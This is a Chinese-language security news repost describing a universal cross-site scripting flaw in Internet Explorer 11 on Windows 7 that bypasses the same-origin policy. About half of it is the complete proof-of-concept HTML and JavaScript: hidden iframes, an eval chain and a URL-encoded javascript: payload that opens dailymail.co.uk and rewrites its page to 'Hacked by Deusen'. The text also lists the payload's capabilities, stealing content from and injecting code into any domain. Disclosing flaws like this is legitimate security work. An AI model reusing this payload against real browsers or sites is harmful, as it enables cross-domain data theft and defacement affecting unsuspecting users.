Internet Explorer 11 on Windows7 同源策略绕过漏洞

admin 2024-01-11 14:16:06 安全脉搏 来源:ZONE.CI 全球网 0 阅读模式

IE又爆出UXSS漏洞了,按照微软的步伐,这漏洞又要不知何时才能修复了。

ie

 

光说不练假把式,看了这个漏洞演示地址,你啥都懂了: http://www.deusen.co.uk/items/insider3show.3362009741042107/

简要说明

此IE漏洞使通过第三域名修改dailymail.co.uk的内容称为可能。
使用方式:
1. 确认弹窗弹出后,等待3秒后关闭。
2. 点击“Go”。
3. 7秒后,dailymail.co.uk的内容将被修改为“Hacked by Deusen”

攻击效果图:

screenshot

技术细节

漏洞类型:UXSS 影响:完全绕过SOP 攻击效果:攻击者可以窃取任意域名的内容、将恶意代码注入任意域名 测试环境:IE11 Win7 2015年1月29日

<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br>
<iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br>
<script>
function go()
{
	w=window.frames[0];
	w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);
</script>

 

weinxin
版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!
评论:0   参与:  0